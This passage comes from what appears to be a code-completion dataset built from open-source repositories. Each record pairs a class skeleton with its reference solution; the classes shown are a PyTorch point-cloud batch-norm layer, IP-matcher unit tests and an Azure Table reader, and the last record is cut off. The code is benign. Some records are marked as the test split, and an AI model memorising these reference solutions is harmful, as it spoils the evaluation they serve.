\"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n <|body_0|>\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n<|end_body_0|>\n\n<|body_start_1|>\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000481", "length_bytes": 1846, "license_type": "permissive", "methods": [{"docstring": "The initialization function. Args: in_channel: The number of input channels.", "name": "__init__", "signature": "def __init__(self, in_channel: int)"}, {"docstring": "The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)", "name": "forward", "signature": "def forward(self, in_feature: torch.Tensor)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005724", "prompt": "Implement the Python class `FieldBatchNormalization` described below.\n\nClass description:\nField convolution layer.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channel: int): The initialization function. Args: in_channel: The number of input channels.\n- def forward(self, in_feature: torch.Tensor): The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)", "prompted_full_text": "Implement the Python class `FieldBatchNormalization` described below.\n\nClass description:\nField convolution layer.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channel: int): The initialization function. Args: in_channel: The number of input channels.\n- def forward(self, in_feature: torch.Tensor): The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\n\n<|skeleton|>\nclass FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n <|body_0|>\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n<|end_body_0|>\n\n<|body_start_1|>\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n<|end_body_1|>\n", "revision_id": "ca88df568a6f2143dcb85d22c005fce4562a7523", "skeleton": "<|skeleton|>\nclass FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n <|body_0|>\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\"\"\"\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n", "source": "the_stack_v2_python_sparse", "source_path": "SDFConv/code/models/layers/sdf_bn.py", "source_repo": "zshyang/FieldConvolution", "split": "test", "star_events_count": 1} {"blob_id": "c884dd266eb3c1cecf302774bc47e794f5bd24f2", "bodies": ["matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\nmismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\nself.assertEqual(None, mismatch)", "matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\nself.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\nself.assertNotEqual(None, matcher.match([]), 'No matches succed.')", "matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\nmismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\nself.assertEqual(None, mismatch)", "matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\nself.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\nself.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')", "matcher = HasLength(2)\nself.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\nself.assertNotEqual(None, matcher.match([]))\nself.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))"], "bodies_text": "<|body_start_0|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n<|end_body_0|>\n\n<|body_start_1|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succed.')\n<|end_body_1|>\n\n<|body_start_2|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n<|end_body_2|>\n\n<|body_start_3|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n<|end_body_3|>\n\n<|body_start_4|>\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n<|end_body_4|>\n", "class_docstring": "Tests for the CLB matchers.", "class_name": "MatcherTestCase", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n <|body_0|>\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.\"\"\"\n <|body_1|>\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n <|body_2|>\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n <|body_3|>\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n<|end_body_0|>\n\n<|body_start_1|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succed.')\n<|end_body_1|>\n\n<|body_start_2|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n<|end_body_2|>\n\n<|body_start_3|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n<|end_body_3|>\n\n<|body_start_4|>\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000482", "length_bytes": 18654, "license_type": "permissive", "methods": [{"docstring": ":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.", "name": "test_contains_all_ips_success", "signature": "def test_contains_all_ips_success(self)"}, {"docstring": ":class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.", "name": "test_contains_all_ips_failure", "signature": "def test_contains_all_ips_failure(self)"}, {"docstring": ":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.", "name": "test_excludes_all_ips_success", "signature": "def test_excludes_all_ips_success(self)"}, {"docstring": ":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.", "name": "test_excludes_all_ips_failure", "signature": "def test_excludes_all_ips_failure(self)"}, {"docstring": ":class:`HasLength` only succeeds when the number of nodes matches the length given.", "name": "test_has_length", "signature": "def test_has_length(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_003176", "prompt": "Implement the Python class `MatcherTestCase` described below.\n\nClass description:\nTests for the CLB matchers.\n\nMethod signatures and docstrings:\n- def test_contains_all_ips_success(self): :class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\n- def test_contains_all_ips_failure(self): :class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.\n- def test_excludes_all_ips_success(self): :class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\n- def test_excludes_all_ips_failure(self): :class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\n- def test_has_length(self): :class:`HasLength` only succeeds when the number of nodes matches the length given.", "prompted_full_text": "Implement the Python class `MatcherTestCase` described below.\n\nClass description:\nTests for the CLB matchers.\n\nMethod signatures and docstrings:\n- def test_contains_all_ips_success(self): :class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\n- def test_contains_all_ips_failure(self): :class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.\n- def test_excludes_all_ips_success(self): :class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\n- def test_excludes_all_ips_failure(self): :class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\n- def test_has_length(self): :class:`HasLength` only succeeds when the number of nodes matches the length given.\n\n<|skeleton|>\nclass MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n <|body_0|>\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.\"\"\"\n <|body_1|>\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n <|body_2|>\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n <|body_3|>\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n<|end_body_0|>\n\n<|body_start_1|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succed.')\n<|end_body_1|>\n\n<|body_start_2|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n<|end_body_2|>\n\n<|body_start_3|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n<|end_body_3|>\n\n<|body_start_4|>\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n<|end_body_4|>\n", "revision_id": "7199cdd67255fe116dbcbedea660c13453671134", "skeleton": "<|skeleton|>\nclass MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n <|body_0|>\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.\"\"\"\n <|body_1|>\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n <|body_2|>\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n <|body_3|>\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fail when the nodes contain only some or none of the all the IPs given.\"\"\"\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succed.')\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n", "source": "the_stack_v2_python_sparse", "source_path": "otter/integration/lib/test_cloud_load_balancer.py", "source_repo": "rackerlabs/otter", "split": "test", "star_events_count": 20} {"blob_id": "fdcddb34ad7adda4320d3826e9ad5ce24805d888", "bodies": ["self.logger = logger\nself.account_name = config[constants.azure_storage_account_name_key_name]\nself.access_key = config[constants.azure_storage_access_key_key_name]\nself.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\nself.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)", "try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\nexcept Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')", "try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\nexcept Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')", "try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\nexcept Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')", "if filter_query is None:\n return table_client.list_entities()\nelse:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)"], "bodies_text": "<|body_start_0|>\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_3|>\n\n<|body_start_4|>\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n<|end_body_4|>\n", "class_docstring": "This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R", "class_name": "AzureTableReader", "detected_licenses": ["MIT", "Elastic-2.0", "Apache-2.0", "BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration obect\"\"\"\n <|body_0|>\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n <|body_1|>\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.\"\"\"\n <|body_2|>\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n <|body_3|>\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_3|>\n\n<|body_start_4|>\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000483", "length_bytes": 4691, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- config : dict Airbyte's configuration obect", "name": "__init__", "signature": "def __init__(self, logger: AirbyteLogger, config: dict)"}, {"docstring": "Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables", "name": "get_table_service_client", "signature": "def get_table_service_client(self) -> TableServiceClient"}, {"docstring": "Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.", "name": "get_table_client", "signature": "def get_table_client(self, table_name: str) -> TableClient"}, {"docstring": "Fetches all tables from storage account and returns them in Airbyte stream.", "name": "get_tables", "signature": "def get_tables(self) -> ItemPaged"}, {"docstring": "Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)", "name": "read_table", "signature": "def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable"}], "n_methods": 5, "prompt": "Implement the Python class `AzureTableReader` described below.\n\nClass description:\nThis reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\n\nMethod signatures and docstrings:\n- def __init__(self, logger: AirbyteLogger, config: dict): Parameters ---------- config : dict Airbyte's configuration obect\n- def get_table_service_client(self) -> TableServiceClient: Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\n- def get_table_client(self, table_name: str) -> TableClient: Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.\n- def get_tables(self) -> ItemPaged: Fetches all tables from storage account and returns them in Airbyte stream.\n- def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable: Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)", "prompted_full_text": "Implement the Python class `AzureTableReader` described below.\n\nClass description:\nThis reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\n\nMethod signatures and docstrings:\n- def __init__(self, logger: AirbyteLogger, config: dict): Parameters ---------- config : dict Airbyte's configuration obect\n- def get_table_service_client(self) -> TableServiceClient: Returns azure table service client from connection string. Table service client facilitate interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\n- def get_table_client(self, table_name: str) -> TableClient: Returns azure table client from connection string. Table client facilitate interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like create table client for.\n- def get_tables(self) -> ItemPaged: Fetches all tables from storage account and returns them in Airbyte stream.\n- def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable: Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\n\n<|skeleton|>\nclass AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service 